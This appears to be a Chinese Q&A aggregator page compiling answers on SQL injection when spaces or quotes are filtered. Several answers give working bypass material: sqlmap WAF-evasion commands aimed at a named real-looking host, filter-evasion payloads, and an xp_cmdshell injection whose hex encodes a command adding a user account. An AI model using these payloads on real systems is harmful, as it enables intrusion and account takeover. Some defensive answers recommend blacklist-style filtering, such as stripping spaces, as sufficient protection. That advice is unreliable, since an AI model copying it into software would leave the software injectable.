当前位置:首页 » 编程语言 » sql注入空格被过滤
扩展阅读
webinf下怎么引入js 2023-08-31 21:54:13
堡垒机怎么打开web 2023-08-31 21:54:11

sql注入空格被过滤

发布时间: 2022-08-21 12:01:29

A. mysql. 小括号绕过

注入错误原因。
SQL注入时,空格的使用是非常普遍的。比如,我们使用union来取得目标数据。
空格被过滤,但括号没有被过滤,可通过括号绕过,我的经验是,在MySQL中,括号是用来包围子查询的。因此,任何可以计算出结果的语句,都可以用括号包围起来。

B. 如何防止SQL注入,并通过脚本来过滤SQL中注入的字符

如果您通过网页获取用户输入的数据并将其插入一个MySQL数据库,那么就有可能发生SQL注入安全的问题。
本章节将为大家介绍如何防止SQL注入,并通过脚本来过滤SQL中注入的字符。
http://e.cnzz.cn/201509/96863872.shtml

C. %201=1-- sql注入怎么过滤

你举出的这个例子是最常见的注入方式了,原因就是在字符串拼接sql的时候如果有--,那么之后的SQL语句即当做注释进行处理,即便代码或存储过程执行,也是不会报错并能顺利执行之前的语句的。
有2个好用的建议
1 把外部的参数,如果包含-- 则统统替换为 - - 即中间加入空格;这样最多报错,但不会被执行成功
2 如果是代码字符串拼接,建议即便是number型的,在做sql的时候仍然加'' 例如select * from a where b = '"+haha+"'(b字段为数值型),这样对外部的参数进行处理,将所有的单引号统统替换为双引号,即可解决。其中意义在于不让后续的参数拼接形成 '' or 1=1-- and.........之类的局面

D. sql注入过程中单引号和多个关键字被过滤怎么办

很高兴回答你的问题
SQL注入成功机率和选择注入目标程序安全性有直接关系.单就你的问题和你的思路来说的话,你还可尝试利用 ANSI 字符代码变体来达到目的 比如 " 号对应 chr(34) .
是否成功取决于他本身程序是否也做了过滤.
另:还有很多方法同样可以达到目的的.比如旁注、跨站、截取cookie 等

E. 利用sqlmap注入时,发现站点对空格进行了过滤,可以使用什么脚本来绕过

0x00 前言
现在的网络环境往往是WAF/IPS/IDS保护着Web 服务器等等,这种保护措施往往会过滤挡住我们的SQL注入查询链接,甚至封锁我们的主机IP,所以这个时候,我们就要考虑怎样进行绕过,达到注入的目标。因为现在WAF/IPS/IDS都把sqlmap 列入黑名单了,呵呵!但是本文基于sqlmap 进行绕过注入测试,介绍至今仍然实用有效的技巧,以下策略在特定的环境能够成功绕过,具体是否绕过,请仔细查看输出的信息。
0x01 确认WAF
首先我们判断该Web 服务器是否被WAF/IPS/IDS保护着。这点很容易实现,因为我们在漏扫或者使用专门工具来检测是否有WAF,这个检测,在nmap 的NSE,或者WVS的策略或者APPSCAN的策略中都有,我们可以利用这些来判断。在此我们,也介绍使用sqlmap 进行检测是否有WAF/IPS/IDS
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --thread 10 --identify-waf#首选
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --thread 10 --check-waf#备选
0x02 使用参数进行绕过
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --random-agent -v 2 #使用任意浏览器进行绕过,尤其是在WAF配置不当的时候
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --hpp -v 3#使用HTTP 参数污染进行绕过,尤其是在ASP.NET/IIS 平台上
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=3.5 --time-sec=60 #使用长的延时来避免触发WAF的机制,这方式比较耗时
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --proxy=211.211.211.211:8080 --proxy-cred=211:985#使用代理进行注入

F. 用什么方法绕过SQL注入的限制

1、运用编码技术绕过
如URLEncode编码,ASCII编码绕过。例如or 1=1即%6f%72%20%31%3d%31,而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。
2、通过空格绕过
如两个空格代替一个空格,用Tab代替空格等,或者删除所有空格,如or’ swords’ =‘swords’ ,由于mssql的松散性,我们可以把or ‘swords’ 之间的空格去掉,并不影响运行。
3、运用字符串判断代替
用经典的or 1=1判断绕过,如or ‘swords’ =’swords’,这个方法就是网上在讨论的。

4、通过类型转换修饰符N绕过
可以说这是一个不错的想法,他除了能在某种程度上绕过限制,而且还有别的作用,大家自己好好想想吧。关于利用,如or ‘swords’ = N’ swords’ ,大写的N告诉mssql server 字符串作为nvarchar类型,它起到类型转换的作用,并不影响注射语句本身,但是可以避过基于知识的模式匹配IDS。
5、通过+号拆解字符串绕过
效果值得考证,但毕竟是一种方法。如 or ‘swords’ =‘sw’ +’ ords’ ;EXEC(‘IN’ +’ SERT INTO ‘+’ …..’ )
6、通过LIKE绕过
以前怎么就没想到呢?如or ‘swords’ LIKE ‘sw’!!!显然可以很轻松的绕过“=”“>”的限制……
7、通过IN绕过
与上面的LIKE的思路差不多,如or ‘swords’ IN (‘swords’)
8、通过BETWEEN绕过
如or ‘swords’ BETWEEN ‘rw’ AND ‘tw’
9、通过>或者<绕过
or ‘swords’ > ‘sw’
or ‘swords’ < ‘tw’
or 1<3
……
10、运用注释语句绕过
用/**/代替空格,如:UNION /**/ Select /**/user,pwd,from tbluser
用/**/分割敏感词,如:U/**/ NION /**/ SE/**/ LECT /**/user,pwd from tbluser

11、用HEX绕过,一般的IDS都无法检测出来
=hex(sysadmin)
=hex(db_owner)
另外,关于通用点的过滤方法,我们可以考虑采用赋值的方法,例如先声明一个变量a,然后把我们的指令赋值给a,然后调用变量a最终执行我们输入的命令。变量a可以是任何命令。如下:
declare @a sysname
select @a=
exec master.dbo.xp_cmdshell @a
效果 how.asp?id=1;declare%20@a% 20sysname%20select%20@a=7300730020002f
00610064006400%20exec%20master.dbo.xp_cmdshell%20@a;–
其中的 7300730020002f00610064006400 就是“net user angel pass /add”的意思。

G. sql 注入过滤代码的问题

过滤好你的参数就OK了,Delect 或 DELECT 或 DelecT 这些没必要过滤的, 坚决过滤掉 ' , " 这些符号,尤其是单引号,就OK了. Delect这些是正常的英文单词 这个都过滤的 国外网站就不用说话啦....

istr = Replace(istr,CHR(32),"& nbsp;")
istr = Replace(istr,CHR(9),"& nbsp;")
istr = Replace(istr,CHR(10), "<b r />")
istr = Replace(istr,CHR(13), "")
istr = Replace(istr,"<","& lt;")
istr = Replace(istr,">","& gt;")
istr = Replace(istr,CHR(34),"& quot;")
istr = Replace(istr," ","& nbsp;")
istr = Replace(istr,CHR(39), "& #39;")

一般过滤掉这些就OK了,把&后面的空格去掉

H. sql注入 form过滤怎么绕过

我常用的三种方法:
1,参数过滤,过滤掉 单引号,or,1=1 等类似这样的 。
2,使用 参数化方法格式化 ,不使用拼接SQL 语句。
3,主要业务使用存储过程,并在代码里使用参数化来调用(存储过程和方法2结合)

I. 现在对sql注入的问题主要的解决方法是什么

这个方法虽然好,但分不出大小写也是白搭 其实 只要过滤掉空格就可以了。
然后 自己设计的时候定义一下 传递的参数中间不能有空格:
比如 ID 当然不能有空格啦 分类 也不会有空格 呵呵

最简单的防注入代码:
<%
function mysql(mylist)
mylist=trim(mylist)
mylist=replace(mylist,"%20","")
mylist=replace(mylist," ","")
mysql=mylist
end function
%>

然后每次调用的时候 直接在页面上加入:
id=mysql(request("id")) 等参数

我想 不管他们用什么代码,如果少了" "空格 Sql 语句就不可能正常运行,也就注入进去了吧。。。。

个人的浅见。。麻烦是麻烦了一点 但对于小网站 也就几个页面要这样子 也无所谓了。。。。

如果谁有发现什么漏动,请回复告知。谢谢